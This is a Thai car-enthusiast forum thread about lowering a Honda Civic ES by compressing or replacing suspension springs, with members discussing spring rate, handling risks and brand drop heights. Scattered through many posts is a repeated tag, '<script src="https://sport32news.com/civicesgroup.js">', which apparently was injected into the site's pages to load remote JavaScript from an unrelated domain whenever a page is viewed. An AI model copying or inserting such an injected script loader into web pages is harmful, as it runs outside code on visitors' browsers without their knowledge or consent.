การทำแบบนี้ ไม่ดีหรอก
การเปลี่ยนสปิงโหลดนั้นเราใช้โช๊คเดิมได้ใช่ไหมครับ แล้วสปิงที่เปลี่ยนเราจะสามารถรู้ได้ยังไงครับว่ามันจะเตี้ยลงไปเท่าไหร่ ผมยกตัวอย่างเช่นผมโหลดด้วยการกดสปิงผมบอกช่างว่าเอาลงอีก3นิ้วก้อจะเตี้ยลงไปอีก3นิ้ว แต่สปิงโหลดผมยังมะค่อยเข้าใจเท่าไร ขอความรู้ด้วยครับ ESเป็นรถคันแรกของผมได้มือ2มาESเป็นรถที่ผมใฝ่ฝันในตอนเรียนครับ พอเรียนจบมีงานทำผมเลยหามือ2มาใช้เพราะป้ายแดงมะมีแล้ว "<script src="https://sport32news.com/civicesgroup.js"> รบกวนพี่ๆในบอร์ดช่วยแนะนำทีครับ
ได้รับคำขอบคุณจาก: วุฒิชัย 
a_ten


ชื่อเล่น: เอ

เข้าร่วม: 11 มกรา 2012
ตอบ: 554

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 519
ให้คำขอบคุณ: 286

ที่อยู่: kanchanaburi
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 20 กุมภา 2012 16:06 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
AofStaR พิมพ์ว่า:
ham_ter พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ทั้งคันครับ


อู่อยู่ในราชบุรีหรือป่าวคับ แถวๆไหนเด๋วผมจะไปทำบ้าง
ขอบคุณมากคับ "<script src="https://sport32news.com/civicesgroup.js">
ร้านอยู่แยกบางแพ อะครับ เขาขายล้อแม๊คด้วยชื่อร้านชาติแม๊คอะครับ รองไปดูช่างมีคำแนะนำดีๆให้ด้วยครับ สงใสไรถามได้

กดยังไงหว่า ไม่เคยเห็น และนึกไม่ออก สปริงนี่มันมีค่า K ด้วยนะ กดอัดไป มันทำได้ยังไงไม่เข้าใจ
แล้วค่า K มันไม่เสียเหรอ แต่เดาว่า วิ่ง เร็วๆ แล้วรูดเซ นี่เกิดจากค่า K ที่มันเพี้ยนไปเหมือนกับการตัดสปริง
ทำให้ ระยะยุบยืดมันเสียไป ทำให้ดีดไม่เท่ากัน ซึ่ง "อันตรายมากมาย"
ถ้าจะให้แนะนำว่าต้องทำอย่างไร ให้เปลี่ยนสปริงโหลดดีกว่า จบกว่าแน่นอน
การทำแบบนี้ ไม่ดีหรอก
การเปลี่ยนสปิงโหลดนั้นเราใช้โช๊คเดิมได้ใช่ไหมครับ แล้วสปิงที่เปลี่ยนเราจะสามารถรู้ได้ยังไงครับว่ามันจะเตี้ยลงไปเท่าไหร่ ผมยกตัวอย่างเช่นผมโหลดด้วยการกดสปิงผมบอกช่างว่าเอาลงอีก3นิ้วก้อจะเตี้ยลงไปอีก3นิ้ว แต่สปิงโหลดผมยังมะค่อยเข้าใจเท่าไร ขอความรู้ด้วยครับ ESเป็นรถคันแรกของผมได้มือ2มาESเป็นรถที่ผมใฝ่ฝันในตอนเรียนครับ พอเรียนจบมีงานทำผมเลยหามือ2มาใช้เพราะป้ายแดงมะมีแล้ว "<script src="https://sport32news.com/civicesgroup.js"> รบกวนพี่ๆในบอร์ดช่วยแนะนำทีครับ


อยากรู้เหมือนกันคับ รอผู้รู้มาตอบคับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: วุฒิชัย 
วุฒิชัย


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

ที่อยู่: แม่สอด-ตาก-โขทัย-อุตรดิตถ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 กุมภา 2012 20:19 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
อัดน้ำมันก็ได้ครับ


ของผมทางเป็นเนินวิ่งได้แค่130เติมที่ครับกลัวมาก
nu_es_05


ชื่อเล่น: นุ

เข้าร่วม: 10 มิถุนา 2010
ตอบ: 1555

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1058
ให้คำขอบคุณ: 5949

ที่อยู่: สุขุมวิท 101/1
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 20 กุมภา 2012 20:41 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
อัดน้ำมันด้วยดีกว่าคับ
Note Panu


เข้าร่วม: 03 กันยา 2009
ตอบ: 434

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 502
ให้คำขอบคุณ: 191

ที่อยู่: Changmai
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 กุมภา 2012 22:37 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
AofStaR พิมพ์ว่า:
ham_ter พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ทั้งคันครับ


อู่อยู่ในราชบุรีหรือป่าวคับ แถวๆไหนเด๋วผมจะไปทำบ้าง
ขอบคุณมากคับ "<script src="https://sport32news.com/civicesgroup.js">
ร้านอยู่แยกบางแพ อะครับ เขาขายล้อแม๊คด้วยชื่อร้านชาติแม๊คอะครับ รองไปดูช่างมีคำแนะนำดีๆให้ด้วยครับ สงใสไรถามได้

กดยังไงหว่า ไม่เคยเห็น และนึกไม่ออก สปริงนี่มันมีค่า K ด้วยนะ กดอัดไป มันทำได้ยังไงไม่เข้าใจ
แล้วค่า K มันไม่เสียเหรอ แต่เดาว่า วิ่ง เร็วๆ แล้วรูดเซ นี่เกิดจากค่า K ที่มันเพี้ยนไปเหมือนกับการตัดสปริง
ทำให้ ระยะยุบยืดมันเสียไป ทำให้ดีดไม่เท่ากัน ซึ่ง "อันตรายมากมาย"
ถ้าจะให้แนะนำว่าต้องทำอย่างไร ให้เปลี่ยนสปริงโหลดดีกว่า จบกว่าแน่นอน
การทำแบบนี้ ไม่ดีหรอก
การเปลี่ยนสปิงโหลดนั้นเราใช้โช๊คเดิมได้ใช่ไหมครับ แล้วสปิงที่เปลี่ยนเราจะสามารถรู้ได้ยังไงครับว่ามันจะเตี้ยลงไปเท่าไหร่ ผมยกตัวอย่างเช่นผมโหลดด้วยการกดสปิงผมบอกช่างว่าเอาลงอีก3นิ้วก้อจะเตี้ยลงไปอีก3นิ้ว แต่สปิงโหลดผมยังมะค่อยเข้าใจเท่าไร ขอความรู้ด้วยครับ ESเป็นรถคันแรกของผมได้มือ2มาESเป็นรถที่ผมใฝ่ฝันในตอนเรียนครับ พอเรียนจบมีงานทำผมเลยหามือ2มาใช้เพราะป้ายแดงมะมีแล้ว "<script src="https://sport32news.com/civicesgroup.js"> รบกวนพี่ๆในบอร์ดช่วยแนะนำทีครับ


สปริงโหลดก็คือสปริงที่สำนักแต่งต่างๆทำขึ้นมาโดยคำนวนค่า K (ค่าแรงในการรับน้ำหนักของสปริง) ให้คงที่ไว้แล้ว โดยใช้เทคโนโลยีในการทำขดลวดสปริงให้มีความเตี้ยลงกว่าสปริงเดิม โดยไม่กระทบกับค่า K ง่ายๆคือค่า K ยังคงเดิม (จะมากน้อย แล้วแต่ยี่ห้อ ส่วนใหญ่ไม่ค่อยต่างจากเดิมเท่าไหร่คับ) แต่ได้ความเตี้ยที่ต่ำลงมา ไม่เหมือนกับการตัดสปริง หรือกดสปริง หรือใช้ความร้อนบีบสปริงที่ข้างต้นได้กว่าไว้อ่ะคับ อันจะทำให้ค่า K เปลี่ยนไป ไม่คงที่ เสียสมดุลในการยุบและยืดของสปริง เป็นปัญหาแต่การทรงตัวของรถครับ...

สปริงโหลดแต่ละยี่ห้อจะมีค่าความเตี้ยบอกไว้เหมือนกันครับ ส่วนใหญ่ที่เห็นจะเตี้ยลงประมาณ 1.5 หรือ 2 นิ้วครับ อันนี้ต้องไปลองหาดูว่ายี่ห้อไหนลงเท่าไหร่ ตย. HR ลง 2 นิ้วหน้าหลังเท่ากัน / Tein ลง 1.5 แต่ด้านหน้าจะเตี้ยกว่าหน่อย / Apex ประมาณ 1.5 นิ้ว / Tanabe ประมาณ 2 นิ้วกว่า (ยี่ห้อนี้เตี้ยมากกกก) ประมาณนั้นครับ ...

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: TidTlE  nu_es_05  AofStaR 
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 กุมภา 2012 23:12 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
K.panu พิมพ์ว่า:
AofStaR พิมพ์ว่า:
ham_ter พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ทั้งคันครับ


อู่อยู่ในราชบุรีหรือป่าวคับ แถวๆไหนเด๋วผมจะไปทำบ้าง
ขอบคุณมากคับ "<script src="https://sport32news.com/civicesgroup.js">
ร้านอยู่แยกบางแพ อะครับ เขาขายล้อแม๊คด้วยชื่อร้านชาติแม๊คอะครับ รองไปดูช่างมีคำแนะนำดีๆให้ด้วยครับ สงใสไรถามได้

กดยังไงหว่า ไม่เคยเห็น และนึกไม่ออก สปริงนี่มันมีค่า K ด้วยนะ กดอัดไป มันทำได้ยังไงไม่เข้าใจ
แล้วค่า K มันไม่เสียเหรอ แต่เดาว่า วิ่ง เร็วๆ แล้วรูดเซ นี่เกิดจากค่า K ที่มันเพี้ยนไปเหมือนกับการตัดสปริง
ทำให้ ระยะยุบยืดมันเสียไป ทำให้ดีดไม่เท่ากัน ซึ่ง "อันตรายมากมาย"
ถ้าจะให้แนะนำว่าต้องทำอย่างไร ให้เปลี่ยนสปริงโหลดดีกว่า จบกว่าแน่นอน
การทำแบบนี้ ไม่ดีหรอก
การเปลี่ยนสปิงโหลดนั้นเราใช้โช๊คเดิมได้ใช่ไหมครับ แล้วสปิงที่เปลี่ยนเราจะสามารถรู้ได้ยังไงครับว่ามันจะเตี้ยลงไปเท่าไหร่ ผมยกตัวอย่างเช่นผมโหลดด้วยการกดสปิงผมบอกช่างว่าเอาลงอีก3นิ้วก้อจะเตี้ยลงไปอีก3นิ้ว แต่สปิงโหลดผมยังมะค่อยเข้าใจเท่าไร ขอความรู้ด้วยครับ ESเป็นรถคันแรกของผมได้มือ2มาESเป็นรถที่ผมใฝ่ฝันในตอนเรียนครับ พอเรียนจบมีงานทำผมเลยหามือ2มาใช้เพราะป้ายแดงมะมีแล้ว "<script src="https://sport32news.com/civicesgroup.js"> รบกวนพี่ๆในบอร์ดช่วยแนะนำทีครับ


สปริงโหลดก็คือสปริงที่สำนักแต่งต่างๆทำขึ้นมาโดยคำนวนค่า K (ค่าแรงในการรับน้ำหนักของสปริง) ให้คงที่ไว้แล้ว โดยใช้เทคโนโลยีในการทำขดลวดสปริงให้มีความเตี้ยลงกว่าสปริงเดิม โดยไม่กระทบกับค่า K ง่ายๆคือค่า K ยังคงเดิม (จะมากน้อย แล้วแต่ยี่ห้อ ส่วนใหญ่ไม่ค่อยต่างจากเดิมเท่าไหร่คับ) แต่ได้ความเตี้ยที่ต่ำลงมา ไม่เหมือนกับการตัดสปริง หรือกดสปริง หรือใช้ความร้อนบีบสปริงที่ข้างต้นได้กว่าไว้อ่ะคับ อันจะทำให้ค่า K เปลี่ยนไป ไม่คงที่ เสียสมดุลในการยุบและยืดของสปริง เป็นปัญหาแต่การทรงตัวของรถครับ...

สปริงโหลดแต่ละยี่ห้อจะมีค่าความเตี้ยบอกไว้เหมือนกันครับ ส่วนใหญ่ที่เห็นจะเตี้ยลงประมาณ 1.5 หรือ 2 นิ้วครับ อันนี้ต้องไปลองหาดูว่ายี่ห้อไหนลงเท่าไหร่ ตย. HR ลง 2 นิ้วหน้าหลังเท่ากัน / Tein ลง 1.5 แต่ด้านหน้าจะเตี้ยกว่าหน่อย / Apex ประมาณ 1.5 นิ้ว / Tanabe ประมาณ 2 นิ้วกว่า (ยี่ห้อนี้เตี้ยมากกกก) ประมาณนั้นครับ ...

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ความรู้ครับ เด้วคงต้องจัดสปิงโหลดซักชุดหล่ะ แต่คงต้องจัดขอบ18ก่อน.ใจชอบvip ถ้าจัดเมื่อไรจะมาอัพอีกทีครับ
boyboom_16


ชื่อเล่น: บอย

เข้าร่วม: 02 ตุลา 2008
ตอบ: 4179

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1559
ให้คำขอบคุณ: 4849

ที่อยู่: Navanakorn pathumthani
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 21 กุมภา 2012 18:52 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
ใจชอบVIPสปริงโหลดเอาไม่ลงหรอกครับ ถุงลมคือทางออกที่ดีที่สุด
ได้รับคำขอบคุณจาก: nu_es_05 
a_ten


ชื่อเล่น: เอ

เข้าร่วม: 11 มกรา 2012
ตอบ: 554

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 519
ให้คำขอบคุณ: 286

ที่อยู่: kanchanaburi
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 23 กุมภา 2012 15:30 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
boyboom_16 พิมพ์ว่า:
ใจชอบVIPสปริงโหลดเอาไม่ลงหรอกครับ ถุงลมคือทางออกที่ดีที่สุด


ถุงลมน่าจะ40000อัพนะคับ "<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.